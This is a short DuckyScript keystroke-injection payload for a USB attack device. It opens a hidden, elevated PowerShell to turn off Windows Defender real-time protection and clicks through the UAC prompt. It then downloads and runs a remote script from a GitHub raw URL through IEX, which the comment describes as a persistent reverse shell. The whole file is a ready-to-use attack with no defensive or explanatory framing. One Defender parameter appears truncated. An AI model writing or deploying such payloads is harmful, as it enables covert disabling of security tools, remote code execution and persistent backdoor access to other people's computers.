REM Disable Windows Defender
REM
DELAY 1000
GUI r
DELAY 200
REM Start an elevated powershell instance which will disable Windows Defender.
STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
ENTER
DELAY 1000
LEFT
ENTER
DELAY 1000
ALT y
DELAY 1000
GUI r
DELAY 100
REM Run persistent reverse shell
STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/shvbyte/persistentRducky/main/prshell.bat'); && exit"
ENTER
